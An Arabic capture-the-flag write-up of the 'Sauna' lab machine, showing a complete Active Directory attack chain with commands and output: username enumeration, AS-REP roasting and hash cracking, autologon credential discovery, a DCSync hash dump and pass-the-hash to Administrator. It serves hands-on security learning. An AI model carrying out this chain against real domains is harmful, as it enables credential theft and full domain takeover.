Sauna - بالعربي

حل sauna بالعربي

Recon

1- عادة رح قلك " تبدأ الاول بعمل Scan على الماشين ب nmap عشان تشوف ال Open Ports الموجودة و ال services/الخدمات و شو منهم فيه ثغرة/vulnerable فتستغله و طبعا بدون عمل استطلاع/recon او enumeration ما ممكن تبدأ اي عملية Pentesting او Hacking" بس هي المرة رح قلك اعتبرها " طرق على المنافذ" او الشبابيك او الابواب صدقني ما فارقة

nmap -sV -sC -p- 10.10.10.175
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-12 09:06:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h15m26s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-05-12T09:07:18
|_ start_date: N/A

في شوية شغلات مثيرة للاهتمام فخلينا نبحبش ("البحبشة" كلمة سورية أصلية تعني البحث) اكتر

SMB‌

كلعادة smbmap & smbclient

smbmap -H 10.10.10.175
[+] IP: 10.10.10.175:445 Name: EGOTISTICAL-BANK.local

ضفت الدومين لملف ال hosts

smbclient -L 10.10.10.175
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available

ما طلع معي شي فرحت اشوف LDAP

LDAP

nmap -n -sV -p 389, 3268 --script "ldap* and not brute" 10.10.10.175

في معلومات كتير هون, و ما كان في منها الفائدة الكبيرة, بس لسا قراتها ممتعة

بما انه ما طلعنا بشي بال SMB, LDAP قررت اروح لل HTTP او الموقع

The Website

بلشت العب شوي و اطقطق هون و هنيك (الهاء بالضم 🙃) و استخدمت ادوات متل dirb, gobuster قرات ال source code او الكود المصدري, و انا عم اتصفح الصفحات وصلت ل about.html و فيها اسماء الفريق

هلق بما انو معنا الاسماء, فالموضوع كلاتي الاسماء رح تستخدم ك usernames او للحاسابات جوا السيرفر, ف أحيانا بتنكتب مثلأ: 1- اول حرف من الاسم و الكنية 2- الاسم الاول و الكنية هي امثلة ممكن تكون مكتوبة بشكل مختلف, بس انا مشيت مع المثال الاول و عملت قائمة كلاتي:

fsmith hbear skerb scoins btaylor sdriver

هون فينك تعمل عدة شغلات بالمستخدمين, انا بدأت باداة kerbrute بحيث اتاكد ان في واحد منهم شغال

./kerbrute_linux_amd64 userenum --dc 10.10.10.175 -d EGOTISTICAL-BANK.local users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 05/12/21 - Ronnie Flathers @ropnop
2021/05/12 15:54:54 > Using KDC(s):
2021/05/12 15:54:54 > 10.10.10.175:88
2021/05/12 15:54:54 > [+] VALID USERNAME: [email protected]
2021/05/12 15:54:54 > Done! Tested 6 usernames (1 valid) in 0.355 seconds

ف HOLLAY المستخدم fsmith طلع موجود

Exploitation

خلينا هلق نعمل ASREP-Roast

‌ASREP-Roast

impacket-GetNPUsers -format hashcat -usersfile users.txt -no-pass -k -dc-ip 10.10.10.175 EGOTISTICAL-BANK.local/
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[email protected]:d2ce372b78b81236a49833b9c8695bdd$bf7e5d488a39f63eebd3fc4ee09e6cbbbd5781bf48acb29da299be1d2779ceca08e326f421937d0c3157faf4af766098a9b4a358093c3fbfd146113e9f2cc328d0cb39043b6147e3f495900063ff82059d54bc01cb9599629460d0629e472012316d812f6311da1e995258eef4fc51cceb5220f12bf7f6d45645bd2e07575d9d26692672324bf9e869089c93f91ad0a35446709738d6b6d7c6f026a86aec1e1d052d509d0570edd23d8c5a49e0cfed6ed2cc229124a2686de8d5c04e863ce2cd580513081e746cafcd4e97c8e76d5355c38a28c80f341a71eb4bf1fdebc631fe5556617f82a7b943c67d66ebfd5abb9161a7a0f0aa0e244a1a772b269c176dfa
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

حصلنا هاش, انا بحب اكسره او اعمله كراك لاني بحب اعرف شو هي كلمة السر, أحيانا الناس بتأبدع بكلمات السر

hashcat.exe -m 18200 fsmith_hash.txt rockyou.txt -d 1 # -d 1 to select my GPU
[email protected]:d2ce372b78b81236a49833b9c8695bdd$bf7e5d488a39f63eebd3fc4ee09e6cbbbd5781bf48acb29da299be1d2779ceca08e326f421937d0c3157faf4af766098a9b4a358093c3fbfd146113e9f2cc328d0cb39043b6147e3f495900063ff82059d54bc01cb9599629460d0629e472012316d812f6311da1e995258eef4fc51cceb5220f12bf7f6d45645bd2e07575d9d26692672324bf9e869089c93f91ad0a35446709738d6b6d7c6f026a86aec1e1d052d509d0570edd23d8c5a49e0cfed6ed2cc229124a2686de8d5c04e863ce2cd580513081e746cafcd4e97c8e76d5355c38a28c80f341a71eb4bf1fdebc631fe5556617f82a7b943c67d66ebfd5abb9161a7a0f0aa0e244a1a772b269c176dfa:Thestrokes23

CREDS: fsmith:Thestrokes23

متحمس؟ حصلنا كلمة سر 😃 اصبر للي جاي 😋

SMB with fsmith account

smbmap -H 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'
[+] IP: 10.10.10.175:445 Name: EGOTISTICAL-BANK.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
RICOH Aficio SP 8300DN PCL 6 NO ACCESS We cant print money
SYSVOL READ ONLY Logon server share
smbclient -L 10.10.10.175 -U 'fsmith'
Enter WORKGROUP\fsmith's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
RICOH Aficio SP 8300DN PCL 6 Printer We cant print money
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available

Get Access

evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents>

Post-Exploitation

بعد ما تجيب الفلاج يا صديقي العزيز رح نبدأ ال enum, عادة بحب اكون شوي يدوي و استخدم شي متل powerview, بس بدي اخلص هي الماشين بسرعة ف رح استخدم ادوات اوتومايتيكة متل SharpHound + BloodHound و winPEASx64.exe

BloodHound

نبدأ مع BloodHound, اتبع الخطوات المعتادة:

1- حمل Sharphound على الماشين 2- اعمللها import او شغلها 3-

Invoke-Bloodhound -CollectionMethod All -Domain htb.local -LDAPUser fsmith -LDAPPass Thestrokes23

4- نزل ملف ال .zip ع جهازك 5- ارميه ب BloodHound و خلينا نمرح شوي

قصة طويلة, قعدت العب كتير هون و هيك كان شكلي

ف رح قلك انا شو سويت ع طول

اول شي بحثت على fsmith و علمته ك Owned و حاولت اشوف وين فيني اروح مع هاد الحساب, شو فيني سوي فيه ! ف اضغط على اسم المستخدم بعدين على Reachable High Value Targets

بما انو في CanPSRemote فحاولت استغلها اعمل powershell remote و ماشتغلت, و انا فاهمك الموضوع بكسر القلب بس هي الحياة يا صديقي لازم نتابع

رجعت مرة تانية لل analysis و ضغطت على Find Principals with DCSync Rights

المستخدم المعه DCSync rights بعني ان ممكن نستخدمه لنعمل DCSyns Attack فمنقدر ننتحل ال DC و نطلع hashes نعدل , نعمل امور معينة, لو عم تسئل شو هو ال DC اعتبره المدير, الرئيس, القائد, الحاكم, big dog, الهدف الاعلى, اي شي بدك ياه

بعد ما ضغطت فوق اول شي شفته هو مستخدم مع GetChanges Rights و هاد ممكن يفيد

ازا ضغطت كليك يمين على ال GetChanges بعدها Help رح تعرف ان ممكن تعمل DCSyncs attack مع هاد المستخدم هيك معنا المستخدم بس بدنا كلمة السر, ف يلا كمان enum

winPEAS

بلشت ب winPEASx64.exe

./winPEASx64.exe

و من بيانات كتير و نتائج كتير مثيرة للاهتمام حصلت هي :

DefaultUserName : EGOTISTICAL-BANK\svc_loanmgr
DefaultPassword : Moneymakestheworldgoround!

هكر هكر تل ابيب, جبنا كلمة السر !

CREDS: svc_loanmgr:Moneymakestheworldgoround!

Dump the hashes

فينك تعمل enum بهي ال creds تدخل smb, winrm ... الخ بس انا رح اروح مباشرة ل اني اطلع ال hashes ب secretsdump

sudo impacket-secretsdump EGOTISTICAL-BANK.LOCAL/[email protected]
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:d4ce71f8b6d50cf725737fb30ed9e0cc:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:62b76ee658204d408e3ff9081ded8388a8e23f0ac2e5c38f4585d809505a1d00
SAUNA$:aes128-cts-hmac-sha1-96:a997c32916d2e2584424e0ee476300b2
SAUNA$:des-cbc-md5:3db03e2fba6d3157
[*] Cleaning up...

Get in as Administrator

هلق PtH, Pass the Hash ب evil-winrm و ندخل ك admin

evil-winrm -i 10.10.10.175 -u 'Administrator' -H 'd9485863c1e9e05851aa40cbb4ab9dff'
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator

و مبروك عليك, هلق فينك تروح تجيب ال root flag و خلصت الحكاية.

Happy Hacking MHZ-Cyber